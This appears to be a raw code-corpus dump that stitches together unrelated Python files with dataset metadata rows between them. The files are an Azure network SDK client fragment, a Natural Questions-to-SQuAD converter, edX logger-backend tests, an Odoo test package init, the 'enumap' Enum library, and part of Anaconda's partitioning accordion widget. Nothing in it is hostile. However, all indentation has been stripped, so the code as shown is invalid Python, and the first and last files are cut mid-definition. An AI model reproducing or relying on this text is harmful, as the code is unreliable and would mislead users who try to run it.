self._config = config
async def _download_initial(
self,
resource_group_name: str,
virtual_wan_name: str,
request: "_models.GetVpnSitesConfigurationRequest",
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._download_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWANName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(request, 'GetVpnSitesConfigurationRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_download_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWANName}/vpnConfiguration'} # type: ignore
async def begin_download(
self,
resource_group_name: str,
virtual_wan_name: str,
request: "_models.GetVpnSitesConfigurationRequest",
**kwargs
) -> AsyncLROPoller[None]:
"""Gives the sas-url to download the configurations for vpn-sites in a resource group.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWAN for which configuration of all vpn-sites is
needed.
:type virtual_wan_name: str
:param request: Parameters supplied to download vpn-sites configuration.
:type request: ~azure.mgmt.network.v2020_04_01.models.GetVpnSitesConfigurationRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._download_initial(
resource_group_name=resource_group_name,
virtual_wan_name=virtual_wan_name,
request=request,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWANName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_download.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWANName}/vpnConfiguration'} # type: ignore
| mit | 6,925,959,147,008,436,000 | 49.802469 | 200 | 0.663913 | false |
google/retrieval-qa-eval | nq_to_squad.py | 1 | 5989 | #!/usr/bin/python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Convert the Natural Questions dataset into SQuAD JSON format.
To use this utility, first follow the directions at the URL below to download
the complete training dataset.
https://ai.google.com/research/NaturalQuestions/download
Next, run this program, specifying the data you wish to convert. For instance,
the invocation:
python nq_to_squad.py\
--data_pattern=/usr/local/data/tnq/v1.0/train/*.gz\
--output_file=/usr/local/data/tnq/v1.0/train.json
will process all training data and write the results into `train.json`. This
file can, in turn, be provided to squad_eval.py using the --squad argument.
"""
import argparse
import glob
import gzip
import json
import logging
import os
import re
def clean_text(start_token, end_token, doc_tokens, doc_bytes,
ignore_final_whitespace=True):
"""Remove HTML tags from a text span and reconstruct proper spacing."""
text = ""
for index in range(start_token, end_token):
token = doc_tokens[index]
if token["html_token"]:
continue
text += token["token"]
# Add a single space between two tokens iff there is at least one
# whitespace character between them (outside of an HTML tag). For example:
#
# token1 token2 ==> Add space.
# token1</B> <B>token2 ==> Add space.
# token1</A>token2 ==> No space.
# token1<A href="..." title="...">token2 ==> No space.
# token1<SUP>2</SUP>token2 ==> No space.
next_token = token
last_index = end_token if ignore_final_whitespace else end_token + 1
for next_token in doc_tokens[index + 1:last_index]:
if not next_token["html_token"]:
break
chars = (doc_bytes[token["end_byte"]:next_token["start_byte"]]
.decode("utf-8"))
# Since some HTML tags are missing from the token list, we count '<' and
# '>' to detect if we're inside a tag.
unclosed_brackets = 0
for char in chars:
if char == "<":
unclosed_brackets += 1
elif char == ">":
unclosed_brackets -= 1
elif unclosed_brackets == 0 and re.match(r"\s", char):
# Add a single space after this token.
text += " "
break
return text
def nq_to_squad(record):
"""Convert a Natural Questions record to SQuAD format."""
doc_bytes = record["document_html"].encode("utf-8")
doc_tokens = record["document_tokens"]
# NQ training data has one annotation per JSON record.
annotation = record["annotations"][0]
short_answers = annotation["short_answers"]
# Skip examples that don't have exactly one short answer.
# Note: Consider including multi-span short answers.
if len(short_answers) != 1:
return
short_answer = short_answers[0]
long_answer = annotation["long_answer"]
# Skip examples where annotator found no long answer.
if long_answer["start_token"] == -1:
return
# Skip examples corresponding to HTML blocks other than <P>.
long_answer_html_tag = doc_tokens[long_answer["start_token"]]["token"]
if long_answer_html_tag != "<P>":
return
paragraph = clean_text(
long_answer["start_token"], long_answer["end_token"], doc_tokens,
doc_bytes)
answer = clean_text(
short_answer["start_token"], short_answer["end_token"], doc_tokens,
doc_bytes)
before_answer = clean_text(
long_answer["start_token"], short_answer["start_token"], doc_tokens,
doc_bytes, ignore_final_whitespace=False)
return {"title": record["document_title"],
"paragraphs":
[{"context": paragraph,
"qas": [{"answers": [{"answer_start": len(before_answer),
"text": answer}],
"id": record["example_id"],
"question": record["question_text"]}]}]}
def main():
parser = argparse.ArgumentParser(
description="Convert the Natural Questions to SQuAD JSON format.")
parser.add_argument("--data_pattern", dest="data_pattern",
help=("A file pattern to match the Natural Questions "
"dataset."),
metavar="PATTERN", required=True)
parser.add_argument("--version", dest="version",
help="The version label in the output file.",
metavar="LABEL", default="nq-train")
parser.add_argument("--output_file", dest="output_file",
help="The name of the SQuAD JSON formatted output file.",
metavar="FILE", default="nq_as_squad.json")
args = parser.parse_args()
root = logging.getLogger()
root.setLevel(logging.DEBUG)
records = 0
nq_as_squad = {"version": args.version, "data": []}
for file in sorted(glob.iglob(args.data_pattern)):
logging.info("opening %s", file)
with gzip.GzipFile(file, "r") as f:
for line in f:
records += 1
nq_record = json.loads(line)
squad_record = nq_to_squad(nq_record)
if squad_record:
nq_as_squad["data"].append(squad_record)
if records % 1000 == 0:
logging.info("processed %s records", records)
print("Converted %s NQ records into %s SQuAD records." %
(records, len(nq_as_squad["data"])))
with open(args.output_file, "w") as f:
json.dump(nq_as_squad, f)
if __name__ == "__main__":
main()
| apache-2.0 | -2,737,648,638,829,636,000 | 35.29697 | 79 | 0.625313 | false |
edx/event-tracking | eventtracking/backends/tests/test_logger.py | 1 | 3068 | """Test the logging backend"""
import json
import datetime
from unittest import TestCase
from unittest.mock import patch
from unittest.mock import sentinel
import pytz
from eventtracking.backends.logger import LoggerBackend
class TestLoggerBackend(TestCase):
"""Test the logging backend"""
def setUp(self):
super().setUp()
patcher = patch('eventtracking.backends.logger.logging')
self.mock_logging = patcher.start()
self.addCleanup(patcher.stop)
self.mock_logger = self.mock_logging.getLogger.return_value
# This will call the mocks
self.backend = LoggerBackend()
# Reset them so that we get "clean" mocks in our tests
self.mock_logging.reset_mock()
self.mock_logger.reset_mock()
def test_logs_to_correct_named_logger(self):
backend = LoggerBackend(name=sentinel.logger_name)
self.mock_logging.getLogger.assert_called_once_with(sentinel.logger_name)
backend.send({})
self.assert_event_emitted({})
def assert_event_emitted(self, event):
"""Asserts exactly one event was emitted"""
self.mock_logger.info.assert_called_once_with(
json.dumps(event)
)
def test_unserializable_event(self):
with self.assertRaises(TypeError):
self.backend.send({'foo': object()})
self.assert_no_events_emitted()
def assert_no_events_emitted(self):
"""Asserts no events have been emitted"""
self.assertFalse(self.mock_logger.info.called)
def test_big_event(self):
backend = LoggerBackend(max_event_size=10)
backend.send({'foo': 'a'*(backend.max_event_size + 1)})
self.assert_no_events_emitted()
def test_unlimited_event_size(self):
default_max_event_size = self.backend.max_event_size
backend = LoggerBackend(max_event_size=None)
event = {'foo': 'a'*(default_max_event_size + 1)}
backend.send(event)
self.assert_event_emitted(event)
def test_event_with_datetime_fields(self):
eastern_tz = pytz.timezone('US/Eastern')
test_time = datetime.datetime(2012, 5, 1, 7, 27, 1, 200)
event = {
'test': True,
'time': test_time,
'converted_time': eastern_tz.localize(test_time),
'date': datetime.date(2012, 5, 7)
}
self.backend.send(event)
self.assert_event_emitted({
'test': True,
'time': '2012-05-01T07:27:01.000200+00:00',
'converted_time': '2012-05-01T11:27:01.000200+00:00',
'date': '2012-05-07'
})
def test_multiple_events(self):
for event in [{'a': 'a'}, {'b': 'b'}]:
self.backend.send(event)
self.assert_event_emitted(event)
self.mock_logger.info.reset_mock()
def test_dynamic_level(self):
backend = LoggerBackend(level='warning')
backend.send({})
self.assertFalse(self.mock_logger.info.called)
self.mock_logger.warning.assert_called_once_with('{}')
| agpl-3.0 | 7,466,477,538,624,997,000 | 31.989247 | 81 | 0.617992 | false |
odoo-arg/odoo_l10n_ar | l10n_ar_invoice_presentation/test/__init__.py | 1 | 1077 | # coding: utf-8
##############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
import test_presentation
import test_presentation_purchase
import test_presentation_sale
import test_presentation_sale_iva
import test_presentation_tools
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -2,854,576,436,236,295,000 | 50.285714 | 78 | 0.651811 | false |
TadLeonard/enumap | enumap.py | 1 | 14184 | import enum
from collections import namedtuple, OrderedDict
from itertools import zip_longest
__version__ = "1.5.0"
class EnumapMeta(enum.EnumMeta):
"""An EnumMeta for friendlier, more informative REPL behavior"""
def _iter_fmt_parts(cls):
names = cls.names()
types = cls.types()
for name in names:
type_ = types.get(name)
type_info = f": {type_.__name__}" if type_ is not None else ""
yield f"{name}{type_info}"
def __repr__(cls):
lines = cls._iter_fmt_parts()
indented_lines = (" " + l for l in lines)
return f"{cls.__name__}(\n" + ",\n".join(indented_lines) + "\n)"
def __str__(cls):
parts = cls._iter_fmt_parts()
return f"{cls.__name__}(" + ", ".join(parts) + ")"
class Enumap(enum.Enum, metaclass=EnumapMeta):
"""An Enum that maps data to its ordered, named members.
Produces OrderedDicts and namedtuples while ensuring that the
keys/fields match the names of the Enum members."""
@classmethod
def names(cls):
try:
names = cls.__names
except AttributeError:
names = cls.__names = tuple(cls.__members__)
return names
@classmethod
def map(cls, *values, **named_values):
"""Returns an OrderedDict from `values` & `named_values`, whose
keys match this Enum's members and their ordering
>>> Fruit = Enumap("Fruit", names="apple orange papaya")
>>> Fruit.map("heart-shaped", "spherical", papaya="ellipsoid")
OrderedDict([('apple', 'heart-shaped'), ('orange', ...), ...])
"""
mapping = cls._make_checked_mapping(*values, **named_values)
return OrderedDict(((k, mapping[k]) for k in cls.names()))
@classmethod
def map_casted(cls, *values, **named_values):
"""Like `map`, but values are converted with the `types`
mapping. Useful for deserializing ordered and named values.
>>> class Order(str, Enumap):
... index: int = "Order ID"
... cost: Decimal = "Total pretax cost"
... due_on: arrow.get = "Delivery date"
...
>>> Order.map_casted("342 32342.23 2017-09-01".split())
OrderedDict(('index', 342), ('cost', Decimal("3242.23")), ...)
"""
mapping = cls._make_casted_mapping(*values, **named_values)
return OrderedDict(((k, mapping[k]) for k in cls.names()))
@classmethod
def tuple(cls, *values, **named_values):
"""Returns a namedtuple from `values` & `named_values`, whose
fields match this Enum's members and their ordering
>>> Tool = Enumap("Tool", names="hammer mallet forehead")
>>> Tool.tuple("small", "heavy", forehead="unwieldy")
Tool_tuple(hammer='small', mallet='heavy', forehead='unwieldy')
"""
tuple_class = cls.tuple_class()
try:
return tuple_class(*values, **named_values)
except TypeError:
mapping = cls._make_checked_mapping(*values, **named_values)
return tuple_class(**mapping)
@classmethod
def tuple_casted(cls, *values, **named_values):
"""Like `tuple`, but values are converted with the `types`
mapping. Useful for deserializing ordered and named values."""
mapping = cls._make_casted_mapping(*values, **named_values)
return cls.tuple_class()(**mapping)
@classmethod
def tuple_class(cls):
"""`namedtuple` class with fields that match this Enum's
members and their ordering"""
try:
tuple_class = cls.__tuple_class
except AttributeError:
tuple_class = namedtuple(cls.__name__ + "_tuple", cls.names())
cls.__tuple_class = tuple_class
return tuple_class
@classmethod
def set_types(cls, *types, **named_types):
"""Set `types` mapping for `map/tuple_casted` methods.
>>> Pastry = Enumap("Pastry", names="croissant donut muffin")
>>> Pastry.set_types(int, int, int, donut=float)
>>> Pastry.types() # donut kwarg overrides donut arg
{'croissant': int, 'donut': float, 'muffin': int}
"""
# type mappings are allowed to be a subset of the member keys
# in other words, not all members have to have a type
sparse_types = SparseEnumap("temporary_types", cls.names())
sparse_type_map = sparse_types.map(*types, **named_types)
non_null_types = {k: v for k, v in sparse_type_map.items()
if v is not None}
type_subset = Enumap(f"{cls.__name__}_types",
tuple(non_null_types.keys()))
cls.__member_types = type_subset.map(*types, **named_types)
@classmethod
def types(cls):
"""Mapping like `{member_name: callable}` for `map/tuple_casted`.
This can either come from type annotations or `set_types`."""
try:
return cls.__member_types
except AttributeError:
types = dict(getattr(cls, "__annotations__", {}))
cls.__member_types = types
return cls.__member_types
@classmethod
def _make_checked_mapping(cls, *values, **named_values):
"""Generate key-value pairs where keys are strictly the names
of the members of this Enum. Raises `KeyError` for both
missing and invalid keys."""
names = cls.names()
mapping = dict(zip(names, values), **named_values)
if set(mapping) == set(names) and len(values) <= len(names):
return mapping
else:
cls._raise_invalid_args(values, mapping, names)
@classmethod
def _make_casted_mapping(cls, *values, **named_values):
"""Like `_make_checked_mapping`, but values are casted based
on the `types()` mapping"""
mapping = cls._make_checked_mapping(*values, **named_values)
mapping.update(_type_cast_items(mapping, cls.types()))
return mapping
@classmethod
def _raise_invalid_args(cls, values, mapping, names):
missing = (set(names) - set(mapping)) or {}
invalid = (set(mapping) - set(names)) or {}
if len(values) > len(names):
n_args = len(values)
n_expected = len(names)
raise KeyError(
f"{cls.__name__} requires keys {names}; "
f"expected {n_expected} arguments, got {n_args}")
else:
raise KeyError(
f"{cls.__name__} requires keys {names}; "
f"missing keys {missing}; invalid keys {invalid}")
def _type_cast_items(mapping, types):
"""Generates key/value pairs for which each
value is casted with the callable in the `types` mapping.
"""
key = None
try:
for key, type_callable in types.items():
yield key, type_callable(mapping[key])
except Exception as e:
value = mapping.get(key)
value_type = type(value).__name__
raise TypeCastError(f"Key '{key}' got invalid value '{value}' "
f"of type {value_type} (error: '{e}')", key)
class TypeCastError(TypeError):
"""Raised when an Enumap field raises an exception
during type casting for Enumap.tuple_casted or Enumap.map_casted
Attributes
key: key or field name for which a value could not be
successfully type casted
"""
def __init__(self, message, key):
super().__init__(message)
self.key = key
class default(enum.auto):
"""A subclass of enum.auto that
1. behaves as a unqiue enum member because enum members that aren't unique
effectively become aliases
2. gives the user a way of signaling that an enum value should be used as
a default in the collections created by SparseEnumap.map() or .tuple()
Sample usage:
>>> class Pets(SparseEnumap):
... dogs: int = default(3)
... cats: int = default(44)
... squirrels: float = 3 # this isn't a default at all
>>> Pets.tuple()
Pets_tuple(dogs=3, cats=44, squirrels=None)
"""
def __init__(self, default_value=None):
self._value = (enum.auto.value, default_value)
@property
def value(self):
return self
@value.setter
def value(self, new_value):
actual_default = self._value[-1]
self._value = (new_value, actual_default)
@property
def default(self):
return self._value[1]
def _iter_member_defaults(members):
"""Iterates through Enum members and teases out the default value
the user selected with `default(<user's special value>)` from the
`default` object.
"""
for k, v in members.items():
if isinstance(v.value, default):
yield k, v.value.default
# By not yielding k, v for non-default() objects, we avoid using
# things like auto() as defaults in our .tuple()/.map() collections.
# This makes it explicit when a user is using an enum value
# as a default while ALSO allowing SparseEnumaps to adhere to the
# rules of Enums. Each value of an Enum must be unique, and those that
# aren't are basically just aliases
class SparseEnumapMeta(EnumapMeta):
"""An EnumMeta for friendlier, more informative REPL behavior"""
def _iter_fmt_parts(cls):
# None defaults are not explicitly shown for readability
names = cls.names()
types = cls.types()
defaults = cls.defaults()
for name in names:
type_ = types.get(name)
default = defaults.get(name)
type_info = f": {type_.__name__}" if type_ is not None else ""
default_info = f" = {default!r}" if default is not None else ""
yield f"{name}{type_info}{default_info}"
class SparseEnumap(Enumap, metaclass=SparseEnumapMeta):
"""A less strict Enumap that provides default values
for unspecified keys. Invalid keys are still prohibited."""
@classmethod
def set_defaults(cls, *values, **named_values):
cls.__member_defaults = cls.map(*values, **named_values)
@classmethod
def defaults(cls):
try:
return cls.__member_defaults
except AttributeError:
members = cls.__members__
defaults_spec = Enumap("_Defaults", cls.names())
declared_defaults = dict(_iter_member_defaults(members))
member_defaults = defaults_spec.map(
*[None] * len(cls), **declared_defaults)
cls.__member_defaults = member_defaults
return cls.__member_defaults
@classmethod
def _make_checked_mapping(cls, *values, **named_values):
"""Generate key-value pairs where keys are strictly the names
of the members of this Enum. Raises `KeyError` for both
missing and invalid keys."""
names = cls.names()
names_set = set(names)
defaults = cls.defaults()
# Create a mapping which will be a subset of the final,
# sparse mapping. As we go, record which values are present
# in the mapping and which are missing.
if defaults:
mapping = dict(zip(names, values), **named_values)
missing = names_set - set(mapping)
mapping.update(((k, defaults[k]) for k in missing))
else:
mapping = dict(zip_longest(names, values), **named_values)
# If we haven't been passed invalid keys and we haven't been
# passed too many positional arguments, return the mapping
if set(mapping) == names_set and len(values) <= len(names):
return mapping
else:
cls._raise_invalid_args(values, mapping, names)
@classmethod
def _make_casted_mapping(cls, *values, **named_values):
"""Like `_make_checked_mapping`, but values are casted based
on the `types()` mapping"""
names = cls.names()
names_set = set(names)
defaults = cls.defaults()
# Create a mapping which will be a subset of the final,
# sparse mapping. As we go, record which values are present
# in the mapping and which are missing.
if defaults:
mapping = dict(zip(names, values), **named_values)
present = set(mapping)
missing = names_set - present
mapping.update(((k, defaults[k]) for k in missing))
else:
mapping = dict(zip(names, values), **named_values)
present = set(mapping)
missing = names_set - present
# Cast the values of our mapping with the the type function
# corresponding to their keys. We use the `missing` set of keys
# as a guide here because we don't want to cast missing or default
# values.
types = cls.types()
if types:
present_typed = present & set(types)
relevant_types = {key: types[key] for key in present_typed}
mapping.update(_type_cast_items(mapping, relevant_types))
# Handle default values to create a sparse mapping.
# Missing values will either be filled in with what's in the
# `defaults` mapping or with None if the user hasn't set defaults.
temp = dict(defaults) or {}.fromkeys(names)
temp.update(mapping)
mapping = temp
# If we haven't been passed invalid keys and we haven't been
# passed too many positional arguments, return the mapping
if not present - names_set and len(values) <= len(names):
return mapping
else:
cls._raise_invalid_args(values, mapping, names)
@classmethod
def _raise_invalid_args(cls, values, mapping, names):
if len(values) > len(names):
n_args = len(values)
n_expected = len(names)
raise KeyError(
f"{cls.__name__} requires keys {names}; "
f"expected {n_expected} arguments, got {n_args}")
else:
invalid = set(mapping) - set(names)
raise KeyError(f"{cls.__name__} requires keys {names}; "
f"invalid keys {invalid}")
| mit | -2,633,654,742,041,224,000 | 37.02681 | 78 | 0.590031 | false |
atodorov/anaconda | pyanaconda/ui/gui/spokes/lib/accordion.py | 1 | 21359 | # vim: set fileencoding=utf-8
# Mountpoint selector accordion and page classes
#
# Copyright (C) 2012-2014 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.anaconda_loggers import get_module_logger
from pyanaconda.core.constants import DEFAULT_AUTOPART_TYPE
from pyanaconda.core.i18n import _, C_
from pyanaconda.product import productName, productVersion
from pyanaconda.core.storage import get_supported_autopart_choices
from pyanaconda.ui.gui.utils import escape_markup, really_hide, really_show
import gi
gi.require_version("AnacondaWidgets", "3.3")
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, AnacondaWidgets
log = get_module_logger(__name__)
__all__ = ["MountPointSelector", "Accordion", "Page", "UnknownPage", "CreateNewPage"]
DATA_DEVICE = 0
SYSTEM_DEVICE = 1
SYSTEM_MOUNT_POINTS = [
"/", "/boot", "/boot/efi", "/tmp", "/usr",
"/var", "swap", "PPC PReP Boot", "BIOS Boot"
]
class MountPointSelector(AnacondaWidgets.MountpointSelector):
"""The mount point selector."""
def __init__(self):
super().__init__()
self.root_name = ""
@property
def device_name(self):
return self.get_property("name")
@property
def mount_point(self):
return self.get_property("mountpoint")
@property
def mount_point_type(self):
if not self.mount_point or self.mount_point in SYSTEM_MOUNT_POINTS:
return SYSTEM_DEVICE
else:
return DATA_DEVICE
class Accordion(Gtk.Box):
""" An Accordion is a box that goes on the left side of the custom partitioning spoke.
It stores multiple expanders which are here called Pages. These Pages correspond to
individual installed OSes on the system plus some special ones. When one Page is
expanded, all others are collapsed.
"""
def __init__(self):
super().__init__(orientation=Gtk.Orientation.VERTICAL, spacing=12)
self._expanders = []
self._active_selectors = []
self._current_selector = None
self._last_selected = None
def find_page_by_title(self, title):
for e in self._expanders:
if e.get_child().page_title == title:
return e.get_child()
return None
def _on_expanded(self, obj, cb=None):
# Get the content of the expander.
child = obj.get_child()
if child:
# The expander is not expanded yet.
is_expanded = not obj.get_expanded()
# Show or hide the child.
# We need to set this manually because of a gtk bug:
# https://bugzilla.gnome.org/show_bug.cgi?id=776937
child.set_visible(is_expanded)
if cb:
cb(child)
def _activate_selector(self, selector, activate, show_arrow):
selector.set_chosen(activate)
selector.props.show_arrow = show_arrow
selector.get_page().mark_selection(selector)
def add_page(self, contents, cb):
label = Gtk.Label(label="""<span size='large' weight='bold' fgcolor='black'>%s</span>""" %
escape_markup(contents.page_title), use_markup=True,
xalign=0, yalign=0.5, wrap=True)
expander = Gtk.Expander()
expander.set_label_widget(label)
expander.add(contents)
self.add(expander)
self._expanders.append(expander)
expander.connect("activate", self._on_expanded, cb)
expander.show_all()
def unselect(self):
""" Unselect all items and clear current_selector.
"""
for s in self._active_selectors:
self._activate_selector(s, False, False)
self._active_selectors.clear()
self._current_selector = None
log.debug("Unselecting all items.")
def select(self, selector):
""" Select one item. Remove selection from all other items
and clear ``current_selector`` if set. Add new selector and
append it to selected items. Also select the new item.
:param selector: Selector which we want to select.
"""
self.unselect()
self._active_selectors.append(selector)
self._current_selector = selector
self._last_selected = selector
self._activate_selector(selector, activate=True, show_arrow=True)
log.debug("Select device: %s", selector.device_name)
def _select_with_shift(self, clicked_selector):
# No items selected, only select this one
if not self._last_selected or self._last_selected is clicked_selector:
self.select(clicked_selector)
return
select_items = []
start_selection = False
for s in self.all_selectors:
if s is clicked_selector or s is self._last_selected:
if start_selection:
select_items.append(s) # append last item too
break
else:
start_selection = True
if start_selection:
select_items.append(s)
self.unselect()
self.append_selection(select_items)
def append_selection(self, selectors):
""" Append new selectors to the actual selection. This takes
list of selectors.
If more than 1 item is selected remove the ``current_selector``.
No current selection is allowed in multiselection.
:param list selectors: List of selectors which will be
appended to current selection.
"""
if not selectors:
return
# If multiselection is already active it will be active even after the new selection.
multiselection = ((self.is_multiselection or len(selectors) > 1) or
# Multiselection will be active also when there is one item already
# selected and it's not the same which is in selectors array
(self._current_selector and self._current_selector not in selectors))
# Hide arrow from current selected item if there will be multiselection.
if not self.is_multiselection and multiselection and self._current_selector:
self._current_selector.props.show_arrow = False
for s in selectors:
self._active_selectors.append(s)
if multiselection:
self._activate_selector(s, activate=True, show_arrow=False)
else:
self._activate_selector(s, activate=True, show_arrow=True)
log.debug("Append device %s to the selection.", s.device_name)
if len(selectors) == 1:
self._last_selected = selectors[-1]
if multiselection:
self._current_selector = None
else:
self._current_selector = self._active_selectors[0]
log.debug("Selected items %s; added items %s",
len(self._active_selectors), len(selectors))
def remove_selection(self, selectors):
""" Remove :param:`selectors` from current selection. If only
one item is selected after this operation it's set as
``current_selector``.
Items which are not selected are ignored.
:param list selectors: List of selectors which will be
removed from current selection.
"""
for s in selectors:
if s in self._active_selectors:
self._activate_selector(s, activate=False, show_arrow=False)
self._active_selectors.remove(s)
log.debug("Device %s is removed from the selection.", s)
if len(self._active_selectors) == 1:
self._current_selector = self._active_selectors[0]
self._current_selector.props.show_arrow = True
else:
self._current_selector = None
log.debug("Selected items %s; removed items %s",
len(self._active_selectors), len(selectors))
@property
def current_page(self):
""" The current page is really a function of the current selector.
Whatever selector on the LHS is selected, the current page is the
page containing that selector.
"""
if not self.current_selector:
return None
for page in self.all_pages:
if self.current_selector in page.members:
return page
return None
@property
def current_selector(self):
return self._current_selector
@property
def all_pages(self):
return [e.get_child() for e in self._expanders]
@property
def all_selectors(self):
return [s for p in self.all_pages for s in p.members]
@property
def all_members(self):
for page in self.all_pages:
for member in page.members:
yield (page, member)
@property
def is_multiselection(self):
return len(self._active_selectors) > 1
@property
def is_current_selected(self):
if self.current_selector:
return True
return False
@property
def selected_items(self):
return self._active_selectors
def page_for_selector(self, selector):
""" Return page for given selector. """
for page in self.all_pages:
for s in page.members:
if s is selector:
return page
def expand_page(self, page_title):
page = self.find_page_by_title(page_title)
expander = page.get_parent()
if not expander:
raise LookupError()
if not expander.get_expanded():
expander.emit("activate")
def remove_page(self, page_title):
# First, remove the expander from the list of expanders we maintain.
target = self.find_page_by_title(page_title)
if not target:
return
self._expanders.remove(target.get_parent())
for s in target.members:
if s in self._active_selectors:
self._active_selectors.remove(s)
# Then, remove it from the box.
self.remove(target.get_parent())
def remove_all_pages(self):
for e in self._expanders:
self.remove(e)
self._expanders = []
self._active_selectors = []
self._current_selector = None
def clear_current_selector(self):
""" If current selector is selected, deselect it
"""
if self._current_selector:
if self._current_selector in self._active_selectors:
self._active_selectors.remove(self._current_selector)
self._activate_selector(self._current_selector, activate=False, show_arrow=False)
self._current_selector = None
def process_event(self, selector, event, cb):
""" Process events from selectors and select items as result.
Call cb after selection is done with old selector and new selector
as arguments.
:param selector: Clicked selector
:param event: Gtk event object
:param cb: Callback which will be called after selection is done.
This callback is setup in :meth:`Page.add_selector` method.
"""
gi.require_version("Gdk", "3.0")
from gi.repository import Gdk
if event:
if event.type not in [Gdk.EventType.BUTTON_PRESS, Gdk.EventType.KEY_RELEASE,
Gdk.EventType.FOCUS_CHANGE]:
return
if event.type == Gdk.EventType.KEY_RELEASE and \
event.keyval not in [Gdk.KEY_space, Gdk.KEY_Return, Gdk.KEY_ISO_Enter, Gdk.KEY_KP_Enter, Gdk.KEY_KP_Space]:
return
old_selector = self.current_selector
# deal with multiselection
state = event.get_state()
if state & Gdk.ModifierType.CONTROL_MASK: # holding CTRL
if selector in self._active_selectors:
self.remove_selection([selector])
else:
self.append_selection([selector])
elif state & Gdk.ModifierType.SHIFT_MASK: # holding SHIFT
self._select_with_shift(selector)
else:
self.select(selector)
# Then, this callback will set up the right hand side of the screen to
# show the details for the newly selected object.
cb(old_selector, selector)
class BasePage(Gtk.Box):
""" Base class for all Pages. It implements most methods which is used
all kind of Page classes.
.. NOTE::
You should not instantiate this class. Please create a subclass
and use the subclass instead.
"""
def __init__(self, title):
